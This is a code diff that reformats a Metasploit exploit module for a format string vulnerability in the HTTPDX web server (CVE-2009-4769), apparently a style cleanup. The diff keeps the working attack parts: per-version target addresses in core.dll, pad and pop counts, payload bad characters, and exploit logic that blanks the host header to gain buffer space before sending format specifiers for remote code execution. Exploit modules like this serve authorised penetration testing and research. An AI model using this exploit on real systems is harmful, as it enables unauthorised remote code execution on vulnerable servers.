@@ -11,104 +11,114 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::FormatString
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'HTTPDX tolog() Function Format String Vulnerability',
-      'Description'    => %q{
+    super(
+      update_info(
+        info,
+        'Name' => 'HTTPDX tolog() Function Format String Vulnerability',
+        'Description' => %q{
           This module exploits a format string vulnerability in HTTPDX HTTP server.
-        By sending a specially crafted HTTP request containing format specifiers, an
-        attacker can corrupt memory and execute arbitrary code.
+          By sending a specially crafted HTTP request containing format specifiers, an
+          attacker can corrupt memory and execute arbitrary code.
 
-        By default logging is off for HTTP, but enabled for the 'moderator' user
-        via FTP.
-      },
-      'Author'         =>
-        [
-          'jduck'    # original discovery and metasploit module
+          By default logging is off for HTTP, but enabled for the 'moderator' user
+          via FTP.
+        },
+        'Author' => [
+          'jduck' # original discovery and metasploit module
         ],
-      'References'     =>
-        [
+        'References' => [
           [ 'CVE', '2009-4769' ],
           [ 'OSVDB', '60182' ]
         ],
-      'DefaultOptions' =>
-        {
+        'DefaultOptions' => {
           'EXITFUNC' => 'process'
         },
-      'Privileged'     => true,
-      'Payload'        =>
-        {
+        'Privileged' => true,
+        'Payload' => {
           # format string max length
-          'Space'    => 1024,
+          'Space' => 1024,
           'BadChars' => "\x00\x0a\x0d\x25\x2f\x3f\x5c",
           'DisableNops'	=> true,
-          'StackAdjustment' 	=> -1500
+          'StackAdjustment' => -1500
         },
-      'Platform'       => 'win',
-      'Targets'        =>
-        [
+        'Platform' => 'win',
+        'Targets' => [
           #
           # Automatic targeting via fingerprinting
           #
-          [ 'Automatic Targeting', { 'auto' => true }  ],
+          [ 'Automatic Targeting', { 'auto' => true } ],
 
           #
           # specific targets
           #
-          [	'httpdx 1.4 - Windows XP SP3 English',
+          [
+            'httpdx 1.4 - Windows XP SP3 English',
             {
-              'PadBytes' 	=> 2,
-              'NumPops' 	=> 22,
-              'Writable' 	=> 0x64f87810, 	# empty space in core.dll imports
-              'FlowHook'	=> 0x64f870e8		# core.dll import for strlen
+              'PadBytes' => 2,
+              'NumPops' => 22,
+              'Writable' => 0x64f87810,	# empty space in core.dll imports
+              'FlowHook'	=> 0x64f870e8	# core.dll import for strlen
             }
           ],
-          [	'httpdx 1.4.5 - Windows XP SP3 English',
+          [
+            'httpdx 1.4.5 - Windows XP SP3 English',
             {
-              'PadBytes' 	=> 2,
-              'NumPops' 	=> 22,
-              'Writable' 	=> 0x64f87810, 	# empty space in core.dll imports
-              'FlowHook'	=> 0x64f870e8		# core.dll import for strlen
+              'PadBytes' => 2,
+              'NumPops' => 22,
+              'Writable' => 0x64f87810,	# empty space in core.dll imports
+              'FlowHook'	=> 0x64f870e8	# core.dll import for strlen
             }
           ],
-          [	'httpdx 1.4.6 - Windows XP SP3 English',
+          [
+            'httpdx 1.4.6 - Windows XP SP3 English',
             {
-              'PadBytes' 	=> 2,
-              'NumPops' 	=> 22,
-              'Writable' 	=> 0x64f87810, 	# empty space in core.dll imports
-              'FlowHook'	=> 0x64f870e8		# core.dll import for strlen
+              'PadBytes' => 2,
+              'NumPops' => 22,
+              'Writable' => 0x64f87810,	# empty space in core.dll imports
+              'FlowHook'	=> 0x64f870e8	# core.dll import for strlen
             }
           ],
-          [	'httpdx 1.4.6b - Windows XP SP3 English',
+          [
+            'httpdx 1.4.6b - Windows XP SP3 English',
             {
-              'PadBytes' 	=> 2,
-              'NumPops' 	=> 22,
-              'Writable' 	=> 0x64f87810, 	# empty space in core.dll imports
-              'FlowHook'	=> 0x64f870e8		# core.dll import for strlen
+              'PadBytes' => 2,
+              'NumPops' => 22,
+              'Writable' => 0x64f87810,	# empty space in core.dll imports
+              'FlowHook'	=> 0x64f870e8	# core.dll import for strlen
             }
-            ],
-          [	'httpdx 1.5 - Windows XP SP3 English',
+          ],
+          [
+            'httpdx 1.5 - Windows XP SP3 English',
             {
-              'PadBytes' 	=> 2,
-              'NumPops' 	=> 22,
-              'Writable' 	=> 0x64f87810, 	# empty space in core.dll imports
-              'FlowHook'	=> 0x64f870e8		# core.dll import for strlen
+              'PadBytes' => 2,
+              'NumPops' => 22,
+              'Writable' => 0x64f87810,	# empty space in core.dll imports
+              'FlowHook'	=> 0x64f870e8	# core.dll import for strlen
             }
           ],
 
           #
           # Debugging target
           #
-          [ 'Debug target',
+          [
+            'Debug target',
             {
-              'PadBytes'  => 2,
-              'NumPops'   => 22,
-              'Writable'  => 0xfeedfed5,
-              'FlowHook'  => 0xdeadbeef
+              'PadBytes' => 2,
+              'NumPops' => 22,
+              'Writable' => 0xfeedfed5,
+              'FlowHook' => 0xdeadbeef
             }
           ]
         ],
-      'DefaultTarget'  => 0,
-      'DisclosureDate' => '2009-11-17'))
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2009-11-17',
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )
 =begin
 
 NOTE: Even though all targets have the same addresses now, future targets may not.
@@ -129,7 +139,6 @@ For now, that will have to be done manually.
 =end
   end
 
-
   def check
     version = get_version
     if version
@@ -141,9 +150,7 @@ For now, that will have to be done manually.
     Exploit::CheckCode::Safe
   end
 
-
   def exploit
-
     # an empty host header gives us 512 bytes in the client structure
     # (the client->filereq and client->host buffers are adjacement in memory)
     datastore['VHOST'] = ''
@@ -161,7 +168,7 @@ For now, that will have to be done manually.
         fail_with(Failure::Unknown, "The server doesn't appear to be running a vulnerable version of HTTPDX")
       end
 
-      re = Regexp.new(Regexp.escape(version)+' - ', Regexp::IGNORECASE)
+      re = Regexp.new(Regexp.escape(version) + ' - ', Regexp::IGNORECASE)
       self.targets.each do |t|
         if (re.match(t.name))
           mytarget = t
@@ -214,17 +221,16 @@ For now, that will have to be done manually.
     handler
   end
 
-
   def get_version
     info = http_fingerprint # Custom version extraction / automatic target
     if info and (info =~ /httpdx\/(.*) \(Win32\)/)
       return $1
     end
+
     nil
   end
 end
 
-
 =begin
 
 also present in 1.5 (presumably all versions in between)
